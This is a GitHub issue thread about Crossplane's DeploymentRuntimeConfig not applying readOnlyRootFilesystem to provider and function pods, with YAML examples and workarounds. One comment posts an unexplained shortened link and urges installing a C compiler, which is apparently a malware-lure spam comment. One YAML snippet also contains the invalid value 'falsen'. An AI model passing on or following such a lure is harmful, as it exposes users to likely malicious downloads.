### ISSUE TITLE
Not able to set parameters in securityContext for provider and function pods

### ISSUE THREAD

**Issue by deggja** [crossplane/crossplane#5969]
### What happened?
Hello guys.
I am trying to configure `readOnlyRootFilesystem: true` for my `provider` and `function` pods. I am using a `DeploymentRuntimeConfig` for this. Reading the docs [here](https://doc.crds.dev/github.com/crossplane/crossplane/pkg.crossplane.io/DeploymentRuntimeConfig/v1beta1@v1.17.0#spec-deploymentTemplate-spec-template-spec-containers-securityContext-readOnlyRootFilesystem), it seems like this _should_ work for the container as well as the pods.

```
If set, the fields of SecurityContext override the equivalent fields of PodSecurityContext
```

Setting this value correctly defines `readOnlyRootFilesystem` in the `DeploymentRuntimeConfig` as seen below in the live pod manifest:

```
kind: DeploymentRuntimeConfig
metadata:
  name: functions-config
spec:
  deploymentTemplate:
    spec:
      selector:
        matchLabels:
          type: function
      template:
        metadata:
          labels:
            type: function
        spec:
          containers:
          - name: package-runtime
            securityContext:
              readOnlyRootFilesystem: true # this is present here
          tolerations:
          - effect: NoSchedule
            key: workload
            operator: Equal
            value: infra
```

However, it does not seem like this is inherited to the pods that are deployed using this `deploymentTemplate`.

### How can we reproduce it?

Can be reproduced by adding the `securityContext` to a `DeploymentRuntimeConfig` manifest as such:

```
apiVersion: pkg.crossplane.io/v1beta1
kind: DeploymentRuntimeConfig
metadata:
  name: functions-config
  namespace: crossplane-system
spec:
  deploymentTemplate:
    spec:
      selector:
        matchLabels:
          type: function
      template:
        metadata:
          labels:
            type: function
        spec:
          containers:
            - name: package-runtime
              securityContext:
                readOnlyRootFilesystem: true
          tolerations:
            - key: "workload"
              operator: "Equal"
              value: "infra"
              effect: "NoSchedule"
```

Even though this is specified in the deploymentTemplate, its not inherited to the function/provider pods.

### What environment did it happen in?
Crossplane version: 1.17.0
Provider: Azure Kubernetes Services
K8s version: 1.29.7

Thank you.

**Comment by emadellaloggia** [comment]
maybe this will help
https://bit.ly/4evXrQ6
If you don't have the c compliator, install it.(gcc or clang)

**Comment by deggja** [comment]
> maybe this will help https://bit.ly/4evXrQ6 If you don't have the c compliator, install it.(gcc or clang)

ugh.. what?

**Comment by yehlo** [comment]
+1

**Comment by yehlo** [comment]
Hi @deggja not sure if this solves your issue but in my case I didn't specify the runtimeConfig within my provider. 

I applied a runtimeConfig like this: 
```yaml
apiVersion: pkg.crossplane.io/v1beta1
kind: DeploymentRuntimeConfig
metadata:
  name: set-security-context
spec:
  deploymentTemplate:
    spec:
      selector: {} # apply to all providers
      template:
        spec:
          securityContext:
            runAsNonRoot: true
            runAsUser: 65534
            fsGroup: 65534
            seccompProfile:
              type: RuntimeDefault
          containers:
            - name: package-runtime
              securityContext:
                allowPrivilegeEscalation: falsen
                runAsNonRoot: true
                runAsUser: 65534
                capabilities:
                  drop:
                    - ALL
```

And specified it in my provider as such
```yaml
apiVersion: pkg.crossplane.io/v1
kind: Provider
metadata:
  name: my-provider
spec:
  package: my-provider-package-url
  runtimeConfigRef:
    name: set-security-context
```

Hope this helps you or other ppl. 

Regards
Josh

**Comment by deggja** [comment]
Hey @yehlo,
That does work fine and I have used the same approach as you for other `securityContext` parameters. Perhaps the title of this issue is a little misleading.

This works:
```
containers:
  - name: package-runtime
     securityContext:
       allowPrivilegeEscalation: false
```

The only thing I am not able to set is `readOnlyRootFilesystem`.

This does not work:
```
containers:
  - name: package-runtime
     securityContext:
       readOnlyRootFilesystem: true
```

Thank you for your suggestion though.
